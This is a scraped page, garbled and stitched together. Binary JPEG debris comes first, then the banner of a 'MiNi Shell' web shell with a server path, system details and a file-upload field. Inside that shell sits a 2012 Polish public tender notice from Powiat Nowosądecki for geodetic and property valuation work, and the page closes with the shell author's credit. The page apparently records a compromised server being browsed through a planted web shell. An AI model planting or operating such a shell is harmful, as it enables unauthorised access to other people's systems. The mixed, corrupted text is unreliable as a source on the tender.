JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121010/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121010/215781-N-2012.html

<p class="kh_header"><b>Nowy Sącz: ZP.272.23.2012 Zamówienie na sporządzenie dokumentacji związanej z  gospodarowaniem nieruchomościami stanowiącymi własność Skarbu Państwa (dokumentacja geodezyjna, operaty szacunkowe)</b><br>
<b>Numer ogłoszenia: 215781 - 2012; data zamieszczenia: 10.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Nowosądecki, Zarząd Powiatu Nowosądeckiego , ul. Jagiellońska 33, 33-300 Nowy Sącz, woj. małopolskie, tel. 18 4141600, faks 18 4141700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.starostwo.nowy-sacz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP.272.23.2012 Zamówienie na sporządzenie dokumentacji związanej z  gospodarowaniem nieruchomościami stanowiącymi własność Skarbu Państwa (dokumentacja geodezyjna, operaty szacunkowe).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługi sporządzenia dokumentacji związanej z gospodarowaniem nieruchomościami stanowiącymi własność Skarbu Państwa:
- geodezyjny podział działki; 
- analiza stanu prawnego nieruchomości;
- sporządzenie kopii mapy ewidencyjnej;
- określenie wartości rynkowej nieruchomości;
- określenie wartości rynkowej działek;
- sporządzenie operatów szacunkowych.

Cena za wykonanie usługi obejmuje również udział w postępowaniu administracyjnym i sądowym w sprawach dotyczących wykonanego opracowania, w tym w rozprawach przed urzędami oraz sądami powszechnymi. 

Postępowanie zostało podzielone na 12 wyszczególnionych poniżej części. Wykonawca może złożyć ofertę na wszystkie części lub dowolnie przez siebie wybrane.

Część	
Zakres prac

CZĘŚĆ NR 1.	Geodezyjny podział działki ewid. nr 1855/1 o pow. 0,17ha położonej w Tyliczu gm. Krynica - Zdrój - celem rozdzielenia terenów położonych zgodnie z miejscowym planem zagospodarowania przestrzennego w liniach rozgraniczających drogi oraz w terenach dla lokalizacji wyciągów narciarskich i tras zjazdowych - w celu uregulowania stanu prawnego nieruchomości.
CZĘŚĆ NR 2.	Analiza stanu prawnego nieruchomości oraz sporządzenie kopii mapy ewidencyjnej              z wykazem zmian gruntowych dla działek ewidencyjnych nr 1397 i 1629 o łącznej pow. 7,37 ha położonych w obr. Paszyn gm. Chełmiec - stanowiących pas drogowy drogi krajowej nr 28 Nowy Sącz - Grybów.
Opracowanie należy sporządzić  w 3 egzemplarzach.
CZĘŚĆ NR 3.	Analiza stanu prawnego nieruchomości oraz sporządzenie kopii mapy ewidencyjnej              z wykazem zmian gruntowych dla działki ewidencyjnej nr 94 o pow. 2,70 ha położonej w obr. Mszalnica  gm. Kamionka Wielka - stanowiącej pas drogowy drogi krajowej nr 28 Nowy Sącz - Grybów.
Opracowanie należy sporządzić  w 3 egzemplarzach.
CZĘŚĆ NR 4.	Analiza stanu prawnego nieruchomości oraz sporządzenie kopii mapy ewidencyjnej             z wykazem zmian gruntowych dla działek ewidencyjnych nr 1904, 1923 i 2053 o łącznej pow. 2,74 ha położonych w obr. Siołkowa gm. Grybów - stanowiących pas drogowy drogi krajowej nr 28 Nowy Sącz - Grybów.
Opracowanie należy sporządzić  w 3 egzemplarzach.
CZĘŚĆ NR 5.	Analiza stanu prawnego nieruchomości oraz sporządzenie kopii mapy ewidencyjnej             z wykazem zmian gruntowych dla działek ewidencyjnych  położonych w następujących obrębach:
1. Chomranice gm. Chełmiec, działka ewidencyjna 357 o pow. 0.03 ha,
2. Marcinkowice gm. Chełmiec, działka ewidencyjna 132/2 o pow. 2.14 ha,
3. Biała Niżna gm. Grybów, działka ewidencyjna 569 o pow. 0,07 ha,
4. Stróże gm. Grybów, działki ewidencyjne nr:  331/20 o pow.0.0315 ha, 331/18 o pow.0.0011ha, 331/19 o pow. 0.0411 ha, 331/7 o pow. 0.0123 ha, 331/8 o pow.0.0060 ha, 331/11 o pow. 0.1379 ha, 1082/1 o pow. 0.0055 ha, 1082/2 o pow.0.0114 ha,1083/3 o pow. 0.0051 ha, 1083/4 o pow. 0.0138 ha, 331/1 o pow. 0.0811 ha, 331/5 o pow. 0.0342 ha,
5. Kamionka Wielka gm. Kamionka Wielka, działki ewidencyjne nr: 27/3 o pow. 1.07 ha, 145 o pow. 0.02 ha,
6. Mszalnica gm. Kamionka Wielka, działka ewidencyjna 1274/3 o pow.0.03ha.
Opracowanie należy sporządzić  w 3 egzemplarzach.
CZĘŚĆ NR 6.	Analiza stanu prawnego nieruchomości oraz sporządzenie kopii mapy ewidencyjnej              z wykazem zmian gruntowych dla działek ewidencyjnych  położonych w następujących obrębach:
1. Andrzejówka gm. Muszyna, działki ewidencyjne nr: 174 o pow. 1.49 ha, 139 o pow. 1.51 ha,  404 o pow. 2.12 ha,  375/2 o pow. 0.28 ha, 376/3 o pow. 0.01 ha,  277 o pow. 2.78 ha,
2. Młodów gm. Piwniczna Zdrój, działka ewidencyjna nr 170/2 o pow. 0.04 ha,
3. Piwniczna gm. Piwniczna Zdrój, działki ewidencyjne nr: 3251/2 o pow. 0.058 ha,  254/2     o pow. 0.0276 ha, 254/3 o pow. 0.1046 ha.
Opracowanie należy sporządzić  w 3 egzemplarzach.
CZĘŚĆ NR 7.	Sporządzenie kopii mapy ewidencyjnej z wykazem zmian gruntowych dla działki ewidencyjnej Skarbu Państwa  nr 670/1 o  pow. 0,0573  ha, położonej w obrębie 1 miasta Grybów wraz ze skompletowaniem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości.
Opracowanie należy sporządzić  w 3 egzemplarzach.
CZĘŚĆ NR 8.	Sporządzenie operatu szacunkowego określenia wartości nieruchomości  położonej            w Muszynie przy ul. Nowej 70 oznaczonej jako działki ewid. Nr 105/1, 105/2, 106/2, 106/3, 106,4 i 106/5 o łącznej powierzchni 0,1843ha obręb ewidencyjny Muszyna zabudowanej budynkiem administracyjno - hotelowym - dla potrzeb ustalenia opłaty rocznej z tytułu trwałego zarządu, w związku z toczącym się postępowaniem o ustanowienie trwałego zarządu na rzecz Centrum Edukacji Zawodowej Ministerstwa Finansów. Stosownie do art. 88 i 90 Ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami wycena nie uwzględnia wartości nakładów na nieruchomości.
CZĘŚĆ NR 9.	Sporządzenie operatu szacunkowego określenia wartości nieruchomości  położonej           w Krynicy - Zdroju przy ul. Czarny Potok 39 oznaczonej jako działka ewid. nr 568                o powierzchni 0,0171ha obręb Krynica Wieś, zabudowanej budynkiem wczasowym - dla potrzeb ustalenia opłaty rocznej z tytułu trwałego zarządu, w związku z toczącym się postępowanie o ustanowienie trwałego zarządu na rzecz Centrum Edukacji Zawodowej Ministerstwa Finansów. Stosownie do art. 88 i 90 Ustawy z dnia 21 sierpnia 1997 r.              o gospodarce nieruchomościami wycena nie uwzględnia wartości nakładów                        na nieruchomości.
CZĘŚĆ NR 10.	Określenie wartości rynkowej nieruchomości gruntowej, oznaczonej jako działki ewid. nr 284, 297, 298, 299, 300, 325, 710, 711, 712 o łącznej pow.8,66ha, położone w Olszanie gm. Podegrodzie, stanowiąca własność Skarbu Państwa w użytkowaniu wieczystym  - dla potrzeb ustalenia opłaty rocznej z tytułu użytkowania wieczystego.
CZĘŚĆ NR 11.	Określenie wartości rynkowej 3 działek gruntu położonych na terenie miasta Krynica-Zdrój zajętych pod drogi publiczne - dla potrzeb ustalenia wysokości odszkodowania należnego byłym właścicielom nieruchomości  przejętych w trybie art.12 ust.4 pkt 2 ustawy z dnia 10.04.2003 r. O szczególnych zasadach przygotowania i realizacji inwestycji  w zakresie dróg publicznych.
Dla każdej działki oddzielny operat.
 Opracowanie należy sporządzić  w 2 egzemplarzach.
CZĘŚĆ NR 12.	Określenie wartości nieruchomości oznaczonych jako działki ewid. nr 985/1, 993/1, 992/1, 995/3, 989/4, 978/1, 980/3, 982/4, 982/6, 974/1 położonych  w  obr. Muszyna gm. Muszyna, przejętych w trybie art.12 ust.4 pkt 2 ustawy z dnia 10.04.2003r. O szczególnych zasadach przygotowania i realizacji inwestycji  w zakresie dróg publicznych w ramach inwestycji pn. Obwodnica Muszyny.
Dla każdej działki oddzielny operat.
 Opracowanie należy sporządzić  w 2 egzemplarzach.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Z uwagi na wartość przedmiotu zamówienia Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych o udzielenie zamówienia mogą ubiegać
się Wykonawcy, którzy spełniają warunki dotyczące posiadania uprawnień do wykonywania określonej
działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Zamawiający na
potwierdzenie spełniania tego warunku udziału w postępowaniu wymaga złożenia oświadczenia w
trybie art. 22 ust 1 ustawy Prawo zamówień publicznych - (oświadczenie to stanowi załącznik nr 2 do
specyfikacji). Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia
na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w
specyfikacji</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych o udzielenie zamówienia mogą ubiegać
się Wykonawcy, którzy spełniają warunki dotyczące posiadania wiedzy i doświadczenia. Zamawiający
na potwierdzenie spełniania tego warunku udziału w postępowaniu wymaga złożenia oświadczenia w
trybie art. 22 ust 1 ustawy Prawo zamówień publicznych - (oświadczenie to stanowi załącznik nr 2 do
specyfikacji). Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia
na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w
specyfikacji</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych o udzielenie zamówienia mogą ubiegać
się Wykonawcy, którzy spełniają warunki dotyczące dysponowania odpowiednim potencjałem
technicznym. Zamawiający na potwierdzenie spełniania tego warunku udziału w postępowaniu
wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych -
(oświadczenie to stanowi załącznik nr 2 do specyfikacji). Zamawiający dokona oceny spełniania
warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych
dokumentach i oświadczeniach wymaganych w specyfikacji</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych o udzielenie zamówienia mogą ubiegać
się Wykonawcy, którzy spełniają warunki dotyczące dysponowania osobami zdolnymi do wykonania
zamówienia. Zamawiający wymaga w szczególności aby: - zamówienie na realizację części nr 1, 2, 3, 4, 5, 6 i 7 wykonywane było przez osoby posiadające właściwe uprawnienia zawodowe w
dziedzinie geodezji i kartografii, - zamówienie na realizację części nr 8, 9, 10, 11 i 12 wykonywane było przez osoby posiadające uprawnienia zawodowe w zakresie
szacowania nieruchomości. Zamawiający na potwierdzenie spełniania tego warunku udziału w
postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień
publicznych - (oświadczenie to stanowi załącznik nr 2 do specyfikacji) oraz złożenia oświadczenia, że
osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli
ustawy nakładają obowiązek posiadania takich uprawnień (wzór oświadczenia stanowi załącznik nr 4
do specyfikacji). Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie
spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach
wymaganych w specyfikacji</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych o udzielenie zamówienia mogą ubiegać
się Wykonawcy, którzy spełniają warunki dotyczące sytuacji ekonomicznej i finansowej. Zamawiający
na potwierdzenie spełniania tego warunku udziału w postępowaniu wymaga złożenia oświadczenia w
trybie art. 22 ust 1 ustawy Prawo zamówień publicznych - (oświadczenie to stanowi załącznik nr 2 do
specyfikacji). Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia
na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w
specyfikacji</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Wyjątek stanowi sytuacja gdy konieczne będzie przedłużenie terminu realizacji zamówienia z powodów niezawinionych przez Wykonawcę np. oczekiwania na wydanie niezbędnych uzgodnień, postanowień lub decyzji innych organów (urzędów miast, urzędów gmin, sądów powszechnych). Forma aneks do umowy. Warunek: zmiana będzie korzystna dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.nowy-sacz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Nowym Sączu, Zespół ds. Zamówień Publicznych, pok. 320 ul. Jagiellońska 33, 33-300 Nowy Sącz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2012 godzina 10:15, miejsce: Starostwo Powiatowe w Nowym Sączu Kancelaria Administracyjna, pok. 113, ul.
Jagiellońska 33, 33-300 Nowy Sącz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com